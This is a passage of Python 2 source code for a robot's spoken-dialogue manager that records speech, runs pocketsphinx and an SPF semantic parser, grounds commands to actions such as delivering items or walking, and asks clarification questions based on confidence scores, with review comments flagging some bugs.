			chosen_expression = self.grounded_to_lexicon_map[gw][0]
		return chosen_expression
	#get text and/or speech from the user
	def get_user_input(self, text=None):
		"""Return the user's next input as a list of [text, score] pairs.

		Offline: read one sanitized line from the poll file. Online:
		either read from stdin (text) or record audio and run the
		pocketsphinx n-best decoder (ASR). Every input is logged.
		"""
		#if offline, just read from poll file
		if (self.run_offline == True):
			#extract and sanitize
			# NOTE(review): this poll-file handle is never closed before
			# f is rebound to the log file below.
			f = open(self.poll_filename)
			user_input = f.read().strip().lower()
			user_input = user_input.replace("'s"," s")
			user_input = user_input.translate(string.maketrans("",""), string.punctuation)
			#log
			f = open(self.log_filename,'a')
			f.write("\t".join(["USER",user_input])+"\n")
			f.close()
			return [[user_input,0]] #full confidence value (log-probability) returned with text
		#else, do normal online processing
		if (text == None):
			text = not self.input_with_ASR
		if (text == True):
			user_input = raw_input()
			f = open(self.log_filename,'a')
			f.write("\t".join(["USER",user_input])+"\n")
			f.close()
			return [[user_input,0]] #full confidence value (log-probability) returned with text
		else:
			#TODO: set recording constants elsewhere
			CHUNK = 1024
			FORMAT = pyaudio.paInt16
			CHANNELS = 1
			RATE = 16000
			RECORD_SECONDS = 4
			#record user command
			fn = "user_utterance.wav"
			self.vocalize("Press 'enter' and then speak your command")
			_ = raw_input()
			p = pyaudio.PyAudio()
			stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)
			print("DEBUG: *recording*")
			frames = []
			for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
				data = stream.read(CHUNK)
				frames.append(data)
			print("DEBUG: *done recording*")
			stream.stop_stream()
			stream.close()
			p.terminate()
			# Write the captured frames out as a WAV for the decoder.
			wf = wave.open(fn, 'wb')
			wf.setnchannels(CHANNELS)
			wf.setsampwidth(p.get_sample_size(FORMAT))
			wf.setframerate(RATE)
			wf.writeframes(b''.join(frames))
			wf.close()
			wavfile = fn
			#get n-best understanding from pocketsphinx
			results = []
			os.system("./sphinx_nbest 1> sphinx_nbest_stdout.txt 2> sphinx_nbest_stderr.txt")
			f = open("sphinx_nbest_stdout.txt",'r')
			# Keep only distinct hypotheses, up to the configured maximum.
			for line in f:
				hyp,score = line.strip().split('\t')
				score = int(score)
				if (hyp not in [r[0] for r in results]):
					results.append([hyp,score])
				if (len(results) == self.max_asr_understandings_to_consider):
					break
			f.close()
			print "DEBUG: ASR results = "+str(results)
			return results
	#guess whether an utterance translates to "yes", "no", "nevermind", or something else
	def classify_user_utterances(self, utterances_text):
		"""Score each utterance against the keyword lists and return the
		best-matching class name, or None when no keyword matched."""
		#utterance_class_scores = {utterance_class:0 for utterance_class in self.utterance_class_keywords}
		utterance_class_scores = {}
		for utterance_class in self.utterance_class_keywords:
			utterance_class_scores[utterance_class] = 0
		# Count one point per keyword occurrence across all utterances.
		for utterance_text in utterances_text:
			for utterance_class in self.utterance_class_keywords:
				for keyword in self.utterance_class_keywords[utterance_class]:
					if (keyword in utterance_text):
						#ad-hoc check for kazunori's name; definitely needs to be removed eventually
						if (keyword == 'no' and 'kazunori' in utterance_text):
							continue
						utterance_class_scores[utterance_class] += 1
		maximum_score,max_utterance_class = self.max_argmax(utterance_class_scores)
		print "utterance_class_scores="+str(utterance_class_scores)+"; max_utterance_class="+max_utterance_class #DEBUG
		if (maximum_score > 0):
			return max_utterance_class
		else:
			return None
	#invoke SPF parser and get the semantic parse(s) of the sentence, as well as any new unmapped words in the utterance
	def parse_utterance(self, user_utterance_text):
		"""Run the SPF parser on one utterance.

		Writes the utterance to the experiment's test.ccg, invokes the
		SPF jar, then scrapes its log for (parse, score) pairs and for
		EMPTY tokens (contiguous runs of unmapped words).

		Returns (parses, unmapped_words_in_utterance) where parses is a
		list of (parse_string, score) and the second item maps each
		unknown word sequence to an empty dict.
		"""
		f = open(os.path.join(self.path_to_experiment,'data','test.ccg'),'w')
		f.write(user_utterance_text+"\n(lambda $0:e $0)\n")
		f.close()
		#run parser and read output
		os.system('java -jar '+self.path_to_spf+' '+os.path.join(self.path_to_experiment,'test.exp'))
		f = open(os.path.join(self.path_to_experiment,'logs','load_and_test.log'),'r')
		lines = f.read().split("\n")
		parses = []
		current_unmapped_sequence = None #[sequence, last_index]
		unmapped_words_in_utterance = {}
		for i in range(0,len(lines)):
			if (' WRONG: ' in lines[i] or 'too many parses' in lines[i]): #found parses
				if (' WRONG: ' in lines[i] and len(lines[i].split('WRONG: ')[1]) > 0 and 'parses' not in lines[i].split('WRONG: ')[1]): #one parse
					parses.append((lines[i].split('WRONG: ')[1],0))
				else: #multiple parses
					# Parse entries come in groups of three log lines.
					j = 1 if ' WRONG: ' in lines[i] else 2
					while (' Had correct parses: ' not in lines[i+j]):
						if ('[S' not in lines[i+j]):
							p = lines[i+j][lines[i+j].index('[')+2:]
						else:
							p = lines[i+j].split(']')[2][1:]
						s = float(lines[i+j+1].split()[3])
						print s #DEBUG
						parses.append((p,s))
						j += 3
			elif ('EMPTY' in lines[i] and len(lines[i].split()) >= 4 and lines[i].split()[3] == "EMPTY"): #found unmapped word
				empty_token = lines[i].split()[1]
				# Merge adjacent EMPTY tokens into one multi-word sequence.
				if (current_unmapped_sequence == None):
					current_unmapped_sequence = [empty_token,i]
				elif (i-1 == current_unmapped_sequence[1]):
					current_unmapped_sequence[0] += " "+empty_token
					current_unmapped_sequence[1] = i
				else:
					if (current_unmapped_sequence[0] not in self.known_words):
						unmapped_words_in_utterance[current_unmapped_sequence[0]] = {}
					current_unmapped_sequence = [empty_token,i]
		# Flush the trailing sequence, if any.
		if (current_unmapped_sequence != None and current_unmapped_sequence[0] not in self.known_words):
			unmapped_words_in_utterance[current_unmapped_sequence[0]] = {}
		f.close()
		return parses,unmapped_words_in_utterance
#using list of previous utterances and unmapped words in a current utterance, make fresh alignment guesses
# def update_unmapped_words_alignment_guesses(self, unmapped_words_from_utterances, utterances, unmapped_words_in_utterance):
#
# sys.stderr.write("DEBUG: update_unmapped_words_alignment_guesses called with unmapped_words_in_utterance="+str(unmapped_words_in_utterance)+"\n")
# unmapped_words_from_utterances.append(unmapped_words_in_utterance)
# user_utterance_text = utterances[-1]
# if (len(utterances) > 1):
# for prev in range(2,len(utterances)+1):
# novel_words_in_utterance = [w for w in user_utterance_text.split() if w not in utterances[-prev].split()]
# grounded_terms_in_utterance = []
# for i in range(0,len(novel_words_in_utterance)):
# for j in range(i+1,len(novel_words_in_utterance)+1):
# candidate = " ".join(novel_words_in_utterance[i:j])
# if " ".join(novel_words_in_utterance[i:j]) in self.known_words:
# grounded_terms_in_utterance.append(candidate)
# for unmapped_w in unmapped_words_from_utterances[-prev]:
# for w in grounded_terms_in_utterance:
# if (w in unmapped_words_from_utterances[-prev][unmapped_w]):
# unmapped_words_from_utterances[-prev][unmapped_w][w] += 1
# else:
# unmapped_words_from_utterances[-prev][unmapped_w][w] = 1
# sys.stderr.write("DEBUG: update_unmapped_words_alignment_guesses updated unmapped_words_from_utterances="+str(unmapped_words_from_utterances)+"\n")
#using the mapping of alignment guesses for this set of utterances, update global guesses about referring expression meanings
# def update_all_unmapped_words_guesses(self, unmapped_words_from_utterances):
#
# sys.stderr.write("DEBUG: update_all_unmapped_words_guesses called with current unmapped word/utterance structure "+str(unmapped_words_from_utterances)+"\n")
# for i in range(0,len(unmapped_words_from_utterances)):
# if (len(unmapped_words_from_utterances[i]) > 0):
# for unmapped_w in unmapped_words_from_utterances[i]:
# if (len(unmapped_words_from_utterances[i][unmapped_w]) > 0):
# if (unmapped_w not in self.all_unmapped_words):
# sys.stderr.write("DEBUG: all_unmapped_words adding new count '"+unmapped_w+"'->'"+str(unmapped_words_from_utterances[i][unmapped_w])+"'\n")
# self.all_unmapped_words[unmapped_w] = unmapped_words_from_utterances[i][unmapped_w]
# else:
# for w in unmapped_words_from_utterances[i][unmapped_w]:
# sys.stderr.write("DEBUG: all_unmapped_words adding to existing count '"+unmapped_w+"'->'"+w+"'\n")
# if (w in self.all_unmapped_words[unmapped_w]):
# self.all_unmapped_words[unmapped_w][w] += unmapped_words_from_utterances[i][unmapped_w][w]
# else:
# self.all_unmapped_words[unmapped_w][w] = unmapped_words_from_utterances[i][unmapped_w][w]
	#get the action, patient, and recipient from an asp_node based on dialogue knowledge of possible actions
	#for ambiguous parses (lists of nodes), distribute confidence based on the number of candidate trees in which various candidate groundings exist
	def get_apr_tuple_from_asp_node(self, node):
		"""Return [action, patient, recipient] confidence dicts for *node*.

		A single node maps its function ("served"/"at"/"query") and
		arguments straight to min_confidence_to_accept; a list of nodes
		is averaged into normalized per-role distributions.
		"""
		if (type(node) is not list):
			print "DEBUG: get_apr_tuple_from_asp_node: called on node="+str(node)+" with function "+str(node.function)+" and args "+str(node.arguments) #DEBUG
			if (node.function == "served"):
				return [{"served":self.min_confidence_to_accept},{node.arguments[1]:self.min_confidence_to_accept if node.arguments[1] != None else 0},{node.arguments[0]:self.min_confidence_to_accept if node.arguments[0] != None else 0}]
			elif (node.function == "at"):
				return [{"at":self.min_confidence_to_accept},{False:self.min_confidence_to_accept},{node.arguments[0]:self.min_confidence_to_accept if node.arguments[0] != None else 0}]
			elif (node.function == "query"):
				return [{"query":self.min_confidence_to_accept},{node.arguments[0]:self.min_confidence_to_accept if node.arguments[0] != None else 0},{False:self.min_confidence_to_accept}]
			else:
				sys.stderr.write("ERROR: unrecognized asp node root function '"+node.function+"' in dialogue manager")
		else:
			print "DEBUG: get_apr_tuple_from_asp_node: called on list of nodes="+str(node) #DEBUG
			# Sum each candidate node's per-role scores...
			apr_score_totals = [{},{},{}]
			for n in node:
				apr = self.get_apr_tuple_from_asp_node(n)
				for role in self.asp_role_map:
					if (apr[self.asp_role_map[role]].keys()[0] in apr_score_totals[self.asp_role_map[role]]):
						apr_score_totals[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]] += apr[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]]
					else:
						apr_score_totals[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]] = apr[self.asp_role_map[role]][apr[self.asp_role_map[role]].keys()[0]]
			# ...then normalize each role's totals into a distribution.
			for role in self.asp_role_map:
				role_score_total = float(sum([apr_score_totals[self.asp_role_map[role]][w] for w in apr_score_totals[self.asp_role_map[role]]]))
				if (role_score_total > 0):
					for w in apr_score_totals[self.asp_role_map[role]]:
						apr_score_totals[self.asp_role_map[role]][w] = apr_score_totals[self.asp_role_map[role]][w] / role_score_total
			return apr_score_totals
#given an apr tuple, generate natural language to describe it
def verbalize_apr_tuple(self, apr):
#generate referring expressions for arguments; if user is asking a question, don't use any of the words they used (it looks snarky)
words_to_avoid = self.utterances_for_goal[-1] if apr[self.asp_role_map["action"]] == "query" else ''
patient_ref = self.choose_referring_expression(apr[self.asp_role_map["patient"]],words_to_avoid)
recipient_ref = self.choose_referring_expression(apr[self.asp_role_map["recipient"]],words_to_avoid)
#generate full verbalization
if (apr[self.asp_role_map["action"]] == "served"):
return "bring "+patient_ref+" to "+recipient_ref
elif (apr[self.asp_role_map["action"]] == "at"):
return "walk to "+recipient_ref
elif (apr[self.asp_role_map["action"]] == "query"):
return patient_ref
else:
sys.stderr.write("ERROR: unrecognized apr action '"+apr[self.asp_role_map["action"]]+"' in dialogue manager")
#get a response from user and return the text(s) and classification(s) of the response
def get_user_response(self):
#get and classify utterance
user_utterances = self.get_user_input()
user_utterance_class = self.classify_user_utterances([u[0] for u in user_utterances])
return user_utterances,user_utterance_class
#process unrestricted response from the user and update internal understanding confidences based on parse results
    def process_user_initiative_response(self, user_utterances, user_utterance_class):
        """Digest an open-ended (user-initiative) response and update role confidences.

        user_utterances is a list of (utterance_text, score) ASR hypotheses;
        user_utterance_class is the coarse classification of the whole
        response ("nevermind" aborts the dialogue).  Every hypothesis is
        semantically parsed, each parse is grounded to an ASP node, and
        self.current_asp_confidence is raised for candidates mentioned in
        the groundings and decayed for unmentioned ones.

        Side effects: may set self.request_type to "terminate"; records the
        chosen utterance in self.utterances_for_goal and
        self.utterances_during_dialogue["goal"].

        Returns the highest-confidence parse string (for later retraining),
        or None when nothing parseable/groundable was heard or the user
        gave up.
        """
        #give up if user asked to
        if (user_utterance_class == "nevermind"):
            self.request_type = "terminate" #cease attempt to understand command
            self.role_requested = None
            return None
        #make a pass at understanding
        parses_in_utterance_understandings = []
        unmapped_words_in_utterance_understandings = []
        utterance_scores = []
        for user_utterance,utterance_score in user_utterances:
            utterance_scores.append(utterance_score)
            utterance_parses,unmapped_words_in_utterance_understanding = self.parse_utterance(user_utterance)
            parses_in_utterance_understandings.append(utterance_parses)
            unmapped_words_in_utterance_understandings.append(unmapped_words_in_utterance_understanding)
        #try to map each candidate parse into an ASP node
        asp_nodes = []
        highest_confidence_index = (0,None) #default to highest-confidence ASR for utterance/alignment
        highest_confidence_score = -sys.maxint
        #NOTE(review): highest_confidence_score is never updated inside this loop, so the
        #comparison below always succeeds for any translated parse and the LAST successful
        #translation wins, not the highest-scoring one — confirm whether that is intended
        for i in range(0,len(user_utterances)):
            parses = parses_in_utterance_understandings[i]
            sys.stderr.write("parses for understanding '"+user_utterances[i][0]+"'\n")
            sys.stderr.write(str(parses)+"\n")
            for j in range(0,len(parses)):
                asp_node = self.pta.answer_parse_with_asp(parses[j][0])
                if (asp_node != None and parses[j][1]+utterance_scores[i] > highest_confidence_score): #score is parse score plus ASR score to determine most confident parse
                    highest_confidence_index = (i,j)
                if (type(asp_node) is list): #ambiguity; we will reduce our confidence in the extractions accordingly
                    sys.stderr.write("DEBUG: asp translation yielded multiped valid instantiations for parse '"+parses[j][0]+"'\n")
                    asp_nodes.append([i,j,asp_node])
                else:
                    if (asp_node == None):
                        sys.stderr.write("DEBUG: asp translation failed for parse '"+parses[j][0]+"'\n")
                    else:
                        sys.stderr.write("DEBUG: asp translation successful for parse '"+parses[j][0]+"'\n")
                        asp_nodes.append([i,j,asp_node])
        #choose the "gold" user utterance for future parse (re)training and word alignment guessing
        print "DEBUG: highest confidence utterance: '"+str(user_utterances[highest_confidence_index[0]][0])+"'"
        if (user_utterances[highest_confidence_index[0]][0] == "(null)"): #the Sphinx ASR didn't pick up any words, so don't consider this further, even for retraining/alignment
            return None
        if (highest_confidence_index[1] != None): #else, there will have been no successful translations so we will return None when that check is made
            highest_confidence_parse = parses_in_utterance_understandings[highest_confidence_index[0]][highest_confidence_index[1]][0]
            user_utterance = user_utterances[highest_confidence_index[0]][0]
            unmapped_words_in_utterance = unmapped_words_in_utterance_understandings[highest_confidence_index[0]]
            #note utterance as a novel way of conveying user goal for this dialogue, then update alignment guesses
            self.utterances_for_goal.append(user_utterance)
            if ("goal" in self.utterances_during_dialogue):
                self.utterances_during_dialogue["goal"].append(user_utterance)
            else:
                self.utterances_during_dialogue["goal"] = [user_utterance]
            #self.update_unmapped_words_alignment_guesses(self.unmapped_words_from_utterances, self.utterances_for_goal, unmapped_words_in_utterance)
        #no asp translation produced even a partial ASP node
        if (len(asp_nodes) == 0):
            return None
        #update our confidence in various possible answers using an interpolation of parse confidence and asp ambiguity from multiple instantiation
        #role_candidates = {role:[] for role in self.asp_role_map}
        role_candidates = {}
        for role in self.asp_role_map:
            role_candidates[role] = []
        for i in range(0,len(asp_nodes)):
            #apr_tuple slots appear to map candidate groundings to numeric weights (iterated as a dict below)
            apr_tuple = self.get_apr_tuple_from_asp_node(asp_nodes[i][2])
            for role in self.asp_role_map:
                for candidate in apr_tuple[self.asp_role_map[role]]:
                    if (candidate == None):
                        continue
                    confidence = apr_tuple[self.asp_role_map[role]][candidate] / float(len(asp_nodes)) #confidence is asp ambiguity divided by parser ambiguity; (TODO: tie to parse confidence)
                    role_candidates[role].append(candidate)
                    if (candidate in self.current_asp_confidence[self.asp_role_map[role]]):
                        #interpolate toward 1 by the new evidence's confidence
                        self.current_asp_confidence[self.asp_role_map[role]][candidate] += (1-self.current_asp_confidence[self.asp_role_map[role]][candidate])*confidence
                    else:
                        self.current_asp_confidence[self.asp_role_map[role]][candidate] = confidence
        #decay confidences of things unmentioned in the newest parses
        for role in self.asp_role_map:
            for existing_candidates in self.current_asp_confidence[self.asp_role_map[role]]:
                if (existing_candidates not in role_candidates[role]):
                    self.current_asp_confidence[self.asp_role_map[role]][existing_candidates] = self.current_asp_confidence[self.asp_role_map[role]][existing_candidates]*self.confidence_decay_rate
        return highest_confidence_parse
#given a partial instantiation and a particular role to question about, form a coherent question
    def verbalize_query_from_partial_apr_tuple(self,apr,role_requested):
        """Form a clarification question about role_requested from a partial apr tuple.

        apr holds the action/patient/recipient slots (indexed through
        self.asp_role_map); a slot may be None (unknown) or False.  If this
        (apr, role_requested) pair is identical to the previous one, an
        apology is vocalized first.  Stores apr/role_requested in
        self.last_apr/self.last_role_requested for that comparison.

        Returns the question string; branch combinations not covered below
        fall through and return None implicitly — callers pass the result to
        self.vocalize, so presumably None is tolerated there (TODO confirm).
        """
        sys.stderr.write("DEBUG: verbalize_query_from_partial_apr_tuple apr,role_requested: "+str(apr)+","+str(role_requested)+"\n")
        #if asked to verbalize partial, check whether last verbalization was identical and apologize for needing additional clarification
        if (self.last_apr != None and apr[self.asp_role_map["action"]] == self.last_apr[self.asp_role_map["action"]] and apr[self.asp_role_map["patient"]] == self.last_apr[self.asp_role_map["patient"]] and apr[self.asp_role_map["recipient"]] == self.last_apr[self.asp_role_map["recipient"]] and role_requested == self.last_role_requested):
            self.vocalize("I'm sorry, but I couldn't pinpoint what you meant by that.",request_type="no_clarification_gained",role_requested=None)
        self.last_apr = apr
        self.last_role_requested = role_requested
        #generate referring expressions for arguments
        words_to_avoid = self.utterances_for_goal[-1] if apr[self.asp_role_map["action"]] == "query" else ''
        patient_ref = self.choose_referring_expression(apr[self.asp_role_map["patient"]],words_to_avoid)
        recipient_ref = self.choose_referring_expression(apr[self.asp_role_map["recipient"]],words_to_avoid)
        #asking about the action: phrase depends on which other slots are already known
        if (role_requested == "action"):
            if (apr[self.asp_role_map["action"]] == None):
                if (patient_ref == None and recipient_ref != None):
                    return "What action did you want me to take involving "+recipient_ref+"?"
                elif (patient_ref != None and recipient_ref == None):
                    return "What action did you want me to take involving "+patient_ref+"?"
                else:
                    return "What did you want me to do with "+patient_ref+" for "+recipient_ref+"?"
            elif (apr[self.asp_role_map["action"]] == "served"):
                if (patient_ref == None and recipient_ref != None):
                    return "Should I deliver something to "+recipient_ref+"?"
                elif (patient_ref != None and recipient_ref == None):
                    return "Should I bring "+patient_ref+" to someone?"
                else:
                    return "I should deliver something?"
            elif (apr[self.asp_role_map["action"]] == "at"):
                return "I should walk somewhere?"
        #asking about the patient (the thing to be delivered / queried about)
        elif (role_requested == "patient"):
            if (patient_ref == None):
                if (apr[self.asp_role_map["action"]] == None and recipient_ref != None):
                    return "What will be received by "+recipient_ref+"?"
                elif (apr[self.asp_role_map["action"]] == "served" and recipient_ref == None):
                    return "What should I bring?"
                elif (apr[self.asp_role_map["action"]] == "served" and recipient_ref != None):
                    return "What should I bring to "+recipient_ref+"?"
            else:
                if (apr[self.asp_role_map["action"]] == None and recipient_ref != None):
                    return "So "+patient_ref+" is for "+recipient_ref+"?"
                elif (apr[self.asp_role_map["action"]] == "served" and recipient_ref == None):
                    return "So I am to deliver "+patient_ref+" to someone?"
        #asking about the recipient (person to serve, or location to walk to)
        elif (role_requested == "recipient"):
            if (recipient_ref == None):
                if (apr[self.asp_role_map["action"]] == None and patient_ref != None):
                    return "Who or what is "+patient_ref+" for?"
                elif (apr[self.asp_role_map["action"]] == "served"):
                    if (patient_ref == None):
                        return "To whom should I bring something?"
                    else:
                        return "To whom should I bring "+patient_ref+"?"
                elif (apr[self.asp_role_map["action"]] == "at"):
                    return "Where should I walk?"
            else:
                if (apr[self.asp_role_map["action"]] == None):
                    if (patient_ref != None):
                        return "So "+patient_ref+" is for "+recipient_ref+"?"
                    else:
                        return "I should do something involving "+recipient_ref+"?"
                elif (apr[self.asp_role_map["action"]] == "served" and patient_ref == None):
                    return "I am to deliver something to "+recipient_ref+"?"
#using the current understanding confidence scores, determine the next state and verbalize a query for the user
#this is, effectively, our policy function
    def articulate_next_state(self):
        """Policy function: pick the next dialogue move and phrase it for the user.

        Samples (via random.random() against each role's confidence) which
        roles to treat as settled, applies per-action consistency
        constraints, and either (a) falls back to user initiative when
        nothing is trusted, (b) asks a clarification question about the
        least-confident unknown role, or (c) asks for global confirmation
        when all roles look settled.

        Side effects: sets self.request_type and self.role_requested; may
        delete the "goal" entry of self.dialogue_accepted_parses when a
        clarification invalidates the global goal parse.

        Returns (verbal_query, relatively_confident_about) where the latter
        is the sampled 3-slot apr list used to build the query.
        """
        #use confidence scores to determine what to ask about
        #let confidence influence which arguments we're going to consider relatively correct for this question
        relatively_confident_about = [None,None,None]
        confident_about_at_least_one = False
        for role in self.asp_role_map:
            #stochastic acceptance: higher confidence -> more likely to treat the slot as settled
            if (random.random() < self.current_best_asp_understanding[self.asp_role_map[role]][1]):
                relatively_confident_about[self.asp_role_map[role]] = self.current_best_asp_understanding[self.asp_role_map[role]][0]
                if (relatively_confident_about[self.asp_role_map[role]] not in [False,None]):
                    confident_about_at_least_one = True
        #ad-hoc check for a situation where an action requiring a patient is chosen but the patient confidence is False; will ask for patient
        if (relatively_confident_about[self.asp_role_map["action"]] == "served" and relatively_confident_about[self.asp_role_map["patient"]] == False):
            relatively_confident_about[self.asp_role_map["patient"]] = None
        if (confident_about_at_least_one == False):
            verbal_query = "Sorry I couldn't understand that. Could you reword your original request?"
            self.request_type = "user_initiative"
            self.role_requested = None
            return verbal_query,relatively_confident_about
        else:
            self.request_type = "system_initiative"
        print "DEBUG: articulate_next_state relative confidence="+str(relatively_confident_about) #DEBUG
        #if unconfident about one or more arguments, ask for clarification of the one with the least confidence
        if (relatively_confident_about[self.asp_role_map["action"]] == "at"): #set single-argument constraints
            relatively_confident_about[self.asp_role_map["patient"]] = False
            self.role_requested = "recipient"
            if (relatively_confident_about[self.asp_role_map["recipient"]] == False): #if believing in walking but have chosen absent recipient, choose unknown instead
                relatively_confident_about[self.asp_role_map["recipient"]] = None
        if (relatively_confident_about[self.asp_role_map["action"]] == "query"):
            if (relatively_confident_about[self.asp_role_map["patient"]] == False):
                relatively_confident_about[self.asp_role_map["patient"]] = None
        if (relatively_confident_about[self.asp_role_map["action"]] == "served"): #set two-argument constraints
            if (relatively_confident_about[self.asp_role_map["recipient"]] == False):
                relatively_confident_about[self.asp_role_map["recipient"]] = None
            if (relatively_confident_about[self.asp_role_map["patient"]] == False):
                relatively_confident_about[self.asp_role_map["patient"]] = None
        print "DEBUG: articulate_next_state relative confidence after constraints="+str(relatively_confident_about) #DEBUG
        if (None in relatively_confident_about):
            if (relatively_confident_about[self.asp_role_map["action"]] == "query"): #can't clarify an unknown query argument
                verbal_query = "Sorry I couldn't understand that. Could you reword your question?"
                self.request_type = "user_initiative"
                self.role_requested = None
                return verbal_query,relatively_confident_about
            min_conf = min([self.current_best_asp_understanding[self.asp_role_map[role]][1] for role in self.asp_role_map])
            self.role_requested = [role for role in self.asp_role_map if self.current_best_asp_understanding[self.asp_role_map[role]][1] == min_conf][0]
            if (relatively_confident_about[self.asp_role_map["action"]] == "at"): #another set of constraints
                if (self.role_requested == "patient"): #if believe in walking, don't ask about known-to-be-False-patient
                    self.role_requested = "recipient"
            print "articulate_next_state: current_best_asp_understanding="+str(self.current_best_asp_understanding)+"; min_conf="+str(min_conf)+"; role_requested="+str(self.role_requested) #DEBUG
            if (relatively_confident_about[self.asp_role_map[self.role_requested]] == None and "goal" in self.dialogue_accepted_parses):
                del self.dialogue_accepted_parses["goal"] #if we have to ask for clarification, then the global goal parse currently obtained can't be trusted
            verbal_query = self.verbalize_query_from_partial_apr_tuple(relatively_confident_about,self.role_requested)
        #if relatively confident about all arguments, ask for global confirmation
        else:
            if (relatively_confident_about[self.asp_role_map["action"]] == "query"):
                if (self.role_requested == "action"):
                    self.role_requested = "patient"
                    #verbal_query = "Are you asking a question about '"+self.verbalize_apr_tuple(relatively_confident_about)+"'?"
                    verbal_query = "'"+self.verbalize_apr_tuple(relatively_confident_about)+"', does that answer your question?"
                else:
                    self.role_requested = "action"
                    verbal_query = "Are you asking me a question?"
            else:
                verbal_query = "You want me to "+self.verbalize_apr_tuple(relatively_confident_about)+"?"
        return verbal_query,relatively_confident_about
#process a restricted response from the user and update internal understanding based on expected contents of response only
    def process_system_initiative_response(self, user_utterances, utterance_class):
        """Digest a response to a system-initiative question (confirmation or clarification).

        "yes" locks in the current best understanding (confidence set to 1
        for every settled role); "no" either zeroes the confidence of the
        clarified role's current value or, when rejecting a global
        assumption, terminates; "nevermind" terminates.  Any other response
        is re-parsed, but confidence updates are restricted to the single
        role in self.role_requested (query answers land in the "patient"
        slot).

        Side effects: may vocalize, mutate self.request_type /
        self.role_requested / self.current_asp_confidence, and record the
        utterance in self.utterances_for_clarification and
        self.utterances_during_dialogue.

        Returns the accepted parse string (or a known lexicon parse for a
        single-word answer) for retraining, else None.
        """
        print "process_system_initiative_response: current best understanding="+str(self.current_best_asp_understanding)+"; role requested="+str(self.role_requested) #DEBUG
        if (utterance_class == "yes"):
            self.request_type = None
            self.role_requested = None
            self.vocalize("I thought so")
            for role in self.asp_role_map:
                if (self.roles_relatively_confident_about[self.asp_role_map[role]] != None):
                    self.current_asp_confidence[self.asp_role_map[role]][self.current_best_asp_understanding[self.asp_role_map[role]][0]] = 1
            return None
        elif (utterance_class == "no"):
            self.vocalize("Sorry I misunderstood",request_type="failed_guess",role_requested=None)
            if (self.current_best_asp_understanding[self.asp_role_map["action"]][0] != "query" and self.role_requested != None and self.current_best_asp_understanding[self.asp_role_map[self.role_requested]][0] != None): #the user is rejecting a clarification on an argument
                self.current_asp_confidence[self.asp_role_map[self.role_requested]][self.current_best_asp_understanding[self.asp_role_map[self.role_requested]][0]] = 0
            else: #the user is rejecting an assumption that the system has made; this is the same as a termination request
                #temporarily, we are rejecting when 'query' was rejecting too
                self.request_type = "terminate"
                self.role_requested = None
            return None
        elif (utterance_class == "nevermind"):
            self.request_type = "terminate"
            self.role_requested = None
            return None
        #if this is a system-initiative response with no requested role, it is a confirmation, so if no confirmation/denial was given, we should re-try for it
        if (self.role_requested == None):
            self.vocalize("I'm not sure whether that means I have the right idea.")
            return None
        #if sure we're requesting confirmation and confirmation/denial was not given, need to do an exit to re-clarify
        if (self.roles_relatively_confident_about[self.asp_role_map[self.role_requested]] != None):
            self.vocalize("Let me get a handle on what you want, first.")
            return None
        #make a pass at understanding by parsing
        parses_in_utterance_understandings = []
        unmapped_words_in_utterance_understandings = []
        utterance_scores = []
        for user_utterance,utterance_score in user_utterances:
            utterance_scores.append(utterance_score)
            utterance_parses,unmapped_words_in_utterance_understanding = self.parse_utterance(user_utterance)
            parses_in_utterance_understandings.append(utterance_parses)
            unmapped_words_in_utterance_understandings.append(unmapped_words_in_utterance_understanding)
        #try to map each candidate parse into an ASP node
        asp_nodes = []
        highest_confidence_index = (0,None) #default to highest-confidence ASR for utterance/alignment
        highest_confidence_score = -sys.maxint
        #NOTE(review): as in process_user_initiative_response, highest_confidence_score is
        #never updated, so the last successful translation wins — confirm intent
        for i in range(0,len(user_utterances)):
            parses = parses_in_utterance_understandings[i]
            sys.stderr.write("parses for understanding '"+user_utterances[i][0]+"'\n")
            sys.stderr.write(str(parses)+"\n")
            for j in range(0,len(parses)):
                asp_node = self.pta.answer_parse_with_asp(parses[j][0])
                if (asp_node != None and parses[j][1]+utterance_scores[i] > highest_confidence_score): #score is parse score plus ASR score to determine most confident parse
                    highest_confidence_index = (i,j)
                if (type(asp_node) is list): #ambiguity; we will reduce our confidence in the extractions accordingly
                    sys.stderr.write("DEBUG: asp translation yielded multiped valid instantiations for parse '"+parses[j][0]+"'\n")
                    asp_nodes.append([i,j,asp_node])
                else:
                    if (asp_node == None):
                        sys.stderr.write("DEBUG: asp translation failed for parse '"+parses[j][0]+"'\n")
                    else:
                        sys.stderr.write("DEBUG: asp translation successful for parse '"+parses[j][0]+"'\n")
                        asp_nodes.append([i,j,asp_node])
        #choose the "gold" user utterance for future parse (re)training and word alignment guessing
        print "DEBUG: highest confidence utterance: '"+str(user_utterances[highest_confidence_index[0]][0])+"'"
        if (highest_confidence_index[1] != None): #else, there will have been no successful translations so we will return None when that check is made
            highest_confidence_parse = parses_in_utterance_understandings[highest_confidence_index[0]][highest_confidence_index[1]][0]
            user_utterance = user_utterances[highest_confidence_index[0]][0]
            unmapped_words_in_utterance = unmapped_words_in_utterance_understandings[highest_confidence_index[0]]
            #update alignment guesses
            self.utterances_for_clarification.append(user_utterance)
            goal_utterances_plus_clarification_utterances = self.utterances_for_goal[:]
            goal_utterances_plus_clarification_utterances.extend(self.utterances_for_clarification)
            #self.update_unmapped_words_alignment_guesses(self.unmapped_words_from_utterances, goal_utterances_plus_clarification_utterances, unmapped_words_in_utterance)
            #if user used single-term response which we have a lexicon mapping for, we can take that as the answer
            if (user_utterance in self.known_words and self.known_words[user_utterance][1] in self.grounded_to_lexicon_map):
                self.current_asp_confidence[self.asp_role_map[self.role_requested]][self.known_words[user_utterance][1]] = self.min_confidence_to_accept
                return self.known_words[user_utterance][1] #return a known semantic parse for the utterance for re-training
            #after checking for single-term response and finding none, we know to note whatever was said as an alternative form of an upcoming, known clarification, so we record this
            if (self.role_requested in self.utterances_during_dialogue):
                self.utterances_during_dialogue[self.role_requested].append(user_utterance)
            else:
                self.utterances_during_dialogue[self.role_requested] = [user_utterance]
        #no parses
        if (len(asp_nodes) == 0):
            return None
        #update our confidence in various possible answers using an interpolation of parse confidence and asp ambiguity from multiple instantiation
        role_candidates = []
        for i in range(0,len(asp_nodes)):
            apr_tuple = self.get_apr_tuple_from_asp_node(asp_nodes[i][2])
